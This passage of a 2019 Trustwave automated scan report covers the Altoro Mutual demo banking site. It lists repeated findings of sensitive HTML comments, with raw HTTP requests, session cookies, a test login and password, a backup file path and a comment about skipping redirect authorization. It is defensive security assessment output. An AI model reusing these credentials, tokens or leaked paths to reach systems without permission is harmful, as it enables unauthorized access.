7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 350 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117:8443/doLogin
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 351 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 352 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117:8443/index.jsp HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 353 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 354 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 355 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 356 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 357 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET https://65.61.137.117/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 358 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 359 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://65.61.137.117/index.jsp?content=personal.htm
GET - http://65.61.137.117/index.jsp?content=business.htm
GET - http://65.61.137.117/subscribe.jsp
POST - http://65.61.137.117/doSubscribe
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 360 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 361 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 362 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 363 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 364 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 365 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 366 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 367 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 368 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://demo.testfire.net:8080/index.jsp?content=personal.htm
GET - http://demo.testfire.net:8080/index.jsp?content=business.htm
GET - http://demo.testfire.net:8080/subscribe.jsp
POST - http://demo.testfire.net:8080/doSubscribe
GET - http://demo.testfire.net:8080/default.jsp?content=security.htm
GET - http://demo.testfire.net:8080/survey_questions.jsp
GET - http://demo.testfire.net:8080/survey_questions.jsp?step=a
GET - http://demo.testfire.net:8080/status_check.jsp
GET - http://demo.testfire.net:8080/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 369 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 370 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.microsof
t.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.microsof
t.com HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 371 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 372 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 373 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 374 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 375 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 376 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Remove comments which have sensitive information about the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 377 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 378 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 379 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://65.61.137.117/index.jsp?content=personal.htm
GET - https://65.61.137.117/index.jsp?content=business.htm
GET - https://65.61.137.117/subscribe.jsp
POST - https://65.61.137.117/doSubscribe
GET - https://65.61.137.117/default.jsp?content=security.htm
GET - https://65.61.137.117/survey_questions.jsp
GET - https://65.61.137.117/survey_questions.jsp?step=a
GET - https://65.61.137.117/status_check.jsp
GET - https://65.61.137.117/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 380 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://demo.testfire.net/index.jsp?content=personal.htm
GET - http://demo.testfire.net/index.jsp?content=business.htm
GET - http://demo.testfire.net/subscribe.jsp
POST - http://demo.testfire.net/doSubscribe
GET - http://demo.testfire.net/default.jsp?content=security.htm
GET - http://demo.testfire.net/survey_questions.jsp
GET - http://demo.testfire.net/survey_questions.jsp?step=a
GET - http://demo.testfire.net/status_check.jsp
GET - http://demo.testfire.net/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
URL: https://demo.testfire.net:8443/index.jsp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 381 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net:8443/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 382 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 383 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 384 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://65.61.137.117/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Remove comments which have sensitive information about the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 385 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 386 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 387 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 388 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net:8443/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://demo.testfire.net:8443/sendFeedback HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 389 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 390 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
